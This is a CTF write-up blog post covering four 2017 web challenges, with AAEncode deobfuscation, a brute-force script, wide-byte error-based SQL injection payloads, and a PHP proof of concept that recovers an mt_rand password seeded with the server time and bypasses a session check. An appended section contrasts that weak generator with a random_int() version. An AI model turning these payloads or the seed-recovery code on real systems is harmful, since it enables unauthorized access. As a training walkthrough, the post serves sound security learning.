
Writeups for a CTF, 2017 (某CTF 2017)

WEB 抽奖呗 (Lucky Draw)

View the source

view-source:http://xxx/

Suspicious file

http://xxx/js/jQuery.js

AAEncode and decode

aadecode - Decode - Online

After decoding, the key function getFlag() shows up.

Get Flag

View the function directly in the browser console:

window.getFlag

flag{951c712ac2c3e57053c43d80c0a9e543}

WEB 继续抽 (Keep Drawing)

View the source

view-source:http://xxx:81/

Payload

After a look at the source, brute-force it:

// Brute-force the id: each request fetches a fresh token, then calls get.php
// with encode(md5(t)) for t = 0..200 until the response text contains "flag{".
// encode() and md5() are helper functions already present on the challenge page.
function orz(t) {
    $.get('token.php',
    function(token) {
        console.log(token);
        $.get("get.php?token=" + token + "&id=" + encode(md5(t)),
        function(jsctf3) {
            console.log(jsctf3);
            if(jsctf3['text'].indexOf('flag{')>-1){
                alert(jsctf3['text']);      // found it, stop here
            }else if(t<200){
                orz(t+1);                   // otherwise try the next id
            }
        },
        'json');
    },'json');
}
orz(0);

Get Flag

flag{b81cfec0285f75d4e36d2ccb2f7ec2c0}

Web just a test

A quick test shows it is a character-set (wide-byte) injection, exploited through error-based injection.

  • Dump tables: select table_name from information_schema.tables limit %s,1
  • Dump databases: select table_schema from information_schema.tables limit %s,1
  • Dump columns: select column_name from information_schema.columns where table_name in (0x666c4067) limit %s,1

Final payloads (%s is a Python format placeholder filled in by the loop, %%df a literal %df, the wide byte that breaks the escaping; 0x666c4067 is the table name fl@g in hex; the flag is read in two slices because the extractvalue() error message shows at most 32 characters):

http://xxx:83/111%%df' AND extractvalue(1, concat(0x23, (select mid(f1ag,32,20) from `test`.`fl@g` limit %s,1),0x232323))-- KeTF"
http://xxx:83/111%%df' AND extractvalue(1, concat(0x23, (select mid(f1ag,1,32) from `test`.`fl@g` limit %s,1),0x232323))-- KeTF"

The trusty sqlmap can actually dump it as well.

Get Flag

flag{99cd1872c9b26525a8e5ec878d230caf}

WEB Wrong

I won't even comment on the challenge author's intelligence.

Get the file

Leaked file: http://xxx:85/.index.php.swp

Download it, inspect it, and recover the source with vim -r xxx.php.

Hack it

The password is generated from a timestamp used as the seed. Local time and server time differ, so fetch the server time (the Date response header) and convert it to a timestamp with strtotime().

Compute the pwd from that seed,

then bypass the $_SESSION['userLogin']==$_GET['login'] check via the session_id.

Get Flag

flag{rand_afjk_u8nm_uq2n}

PoC

Wrote this with some spare time; it may come in handy later.

<?php
// Generate the password the same way the leaked index.php does:
// mt_rand() seeded with the server's current timestamp.
function create_password($pw_length =  10){
    $randpwd = "";
    for ($i = 0; $i < $pw_length; $i++){
        $randpwd .= chr(mt_rand(33, 126));
    }
    return $randpwd;
}

// Parse the raw header block(s) returned by curl into name => value arrays.
function get_headers_from_curl_response($headerContent)
{
    $headers = array();
    $arrRequests = explode("\r\n\r\n", $headerContent);
    for ($index = 0; $index < count($arrRequests) -1; $index++) {
        foreach (explode("\r\n", $arrRequests[$index]) as $i => $line)
        {
            if ($i === 0)
                $headers[$index]['http_code'] = $line;   // status line
            else
            {
                // limit 2 so a value containing ": " is not cut short
                list ($key, $value) = explode(': ', $line, 2);
                $headers[$index][$key] = $value;
            }
        }
    }
    return $headers;
}

// Fetch $url. With $d = True, return only the server's Date header
// (the seed source) instead of the full response.
function curl_get($url,$param,$d=False){
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 1);         // keep headers in the output
    curl_setopt($ch, CURLOPT_TIMEOUT, 5);
    curl_setopt($ch, CURLOPT_VERBOSE, 1);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $res = curl_exec($ch);
    if ($d){
        $header = get_headers_from_curl_response(substr($res, 0, curl_getinfo($ch, CURLINFO_HEADER_SIZE)));
        $res = $header[0]['Date'];
    }
    curl_close($ch);
    return $res;
}

$url = "http://117.34.111.15:85/";
$seed = curl_get($url,"",True);          // server time from the Date header
mt_srand(strtotime($seed));              // seed exactly as the server does
$pwd=urlencode(create_password());
// empty login= makes the loose $_SESSION['userLogin']==$_GET['login'] check pass
echo curl_get($url."index.php?pwd=$pwd&login=","");
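Added example, my own code rather than the challenge's or the original post's: the seed search the PoC above performs, widened to a +/- N second window to absorb clock skew between client and server, next to a random_int()-based generator that leaves a replay nothing to search. The timestamps are constructed.

```php
<?php
declare(strict_types=1);

// Weak generator, as the leaked index.php did it: Mersenne Twister seeded
// with a timestamp. Same seed (and same PHP major version) => same password.
function weak_password(int $seed, int $len = 10): string {
    mt_srand($seed);
    $pw = '';
    for ($i = 0; $i < $len; $i++) {
        $pw .= chr(mt_rand(33, 126));
    }
    return $pw;
}

// Given a password and an approximate generation time (e.g. the server's
// Date header), try every seed within +/- $window seconds. Returns the
// matching seed, or null if the clocks differ by more than the window.
function recover_seed(string $observed, int $approxTime, int $window): ?int {
    for ($delta = -$window; $delta <= $window; $delta++) {
        if (weak_password($approxTime + $delta, strlen($observed)) === $observed) {
            return $approxTime + $delta;
        }
    }
    return null;
}

// Hardened form: random_int() draws from the OS CSPRNG, so there is no
// seed to recover and no bias across the range.
function strong_password(int $len = 10): string {
    $pw = '';
    for ($i = 0; $i < $len; $i++) {
        $pw .= chr(random_int(33, 126));
    }
    return $pw;
}

// Constructed scenario: the server minted the password at $serverTime and
// our reading of its clock (the Date header) lands 8 seconds later.
$serverTime = 1492300000;                  // constructed, not a real capture
$secret     = weak_password($serverTime);
$seed       = recover_seed($secret, $serverTime + 8, 30);
printf("weak password %s recovered with seed %s (true seed %d)\n",
       $secret, var_export($seed, true), $serverTime);
printf("strong_password() has no seed to replay: %s\n", strong_password());
```

mt_rand() output changed in PHP 7.1, so the search only matches a target running the same PHP major line as the script.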

End


Title : 某CTF 2017
Author : Virink
Link : https://www.virzz.com/2017/04/16/writeups_for_a_ctf_2017.html
Reprint notice : please keep the original link and author when reposting.